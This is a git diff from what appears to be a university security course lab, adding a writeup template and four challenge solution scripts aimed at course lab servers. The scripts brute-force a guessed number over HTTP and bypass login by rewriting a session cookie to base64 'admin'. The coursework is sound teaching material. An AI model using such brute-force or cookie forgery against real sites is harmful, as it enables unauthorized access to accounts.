diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..60047ca
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "pa/writeups"]
+	path = pa/writeups
+	url = git@gitlab.rnl.tecnico.ulisboa.pt:ssof2526/writeups/ist1106196.git
diff --git a/pa/lab2/chall_guess_big_number.py b/pa/lab2/chall_guess_big_number.py
new file mode 100644
index 0000000..72a2350
--- /dev/null
+++ b/pa/lab2/chall_guess_big_number.py
@@ -0,0 +1,23 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25052"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+top = 100000
+bot = 1
+
+while top - bot > 1:
+	guess = int((top + bot) / 2)
+	resp = sesh.get(BASE+"/number/"+str(guess))
+	content = resp.content.decode('utf-8')
+	print(guess, content)
+	if "SSof" in content:
+		break
+	elif "Higher" in content:
+		bot = guess
+	else:
+		top = guess
+
diff --git a/pa/lab2/chall_guess_number.py b/pa/lab2/chall_guess_number.py
new file mode 100644
index 0000000..c33ef7e
--- /dev/null
+++ b/pa/lab2/chall_guess_number.py
@@ -0,0 +1,15 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25051"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+for guess in range(1,1000):
+	resp = sesh.get(BASE+"/number/"+str(guess))
+	content = resp.content.decode('utf-8')
+	if "SSof" in content:
+		break
+
+	print(guess, content)
diff --git a/pa/lab2/chall_pwntools_sockets.py b/pa/lab2/chall_pwntools_sockets.py
new file mode 100644
index 0000000..640e3a1
--- /dev/null
+++ b/pa/lab2/chall_pwntools_sockets.py
@@ -0,0 +1,20 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25055
+
+conn = remote(HOST, PORT)
+line = conn.recvline_contains(b"until").decode('utf-8')
+
+target = line[54:-1]
+current = "0"
+print("Target:", target)
+
+while target != current:
+	conn.send(b"MORE\n")
+	new = conn.recvline_contains(b"Here you have").decode('utf-8')[15:]
+	current = str(int(current) + int(new))
+	print("New:", new, "Current:", current)
+
+conn.send(b"FINISH\n")
+print(conn.recvall().decode('utf-8'))
diff --git a/pa/lab2/chall_secure.py b/pa/lab2/chall_secure.py
new file mode 100644
index 0000000..47da2a2
--- /dev/null
+++ b/pa/lab2/chall_secure.py
@@ -0,0 +1,22 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25056"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+
+resp = sesh.post(BASE+"/", data={"username": "admin"})
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)
+
+for c in sesh.cookies:
+	if c.name == "user":
+		c.value = "YWRtaW4="
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)
diff --git a/pa/template_wu.md b/pa/template_wu.md
new file mode 100644
index 0000000..f7361db
--- /dev/null
+++ b/pa/template_wu.md
@@ -0,0 +1,22 @@
+# Challenge XYZ writeup
+
+- Vulnerability: What type of vulnerability is being exploited
+  - _Eg, SQL Injection, XSS, Endpoint is vulnerable to brute-force attack, etc_
+- Where: Where is the vulnerability present
+  - _Eg, `/guess/number` endpoint_
+- Impact: What results of exploiting this vulnerability
+  - _Eg, allows to find the server's guess by enumeration_
+- NOTE: Any other observation
+
+## Steps to reproduce
+
+1. Do this
+2. Do that
+3. ...  
+N. Now something bad happened
+
+## POC
+
+```Py
+
+```
diff --git a/pa/writeups b/pa/writeups
new file mode 160000
index 0000000..a67c391
--- /dev/null
+++ b/pa/writeups
@@ -0,0 +1 @@
+Subproject commit a67c3913db2df515699d31ebd013a395f5c24b2f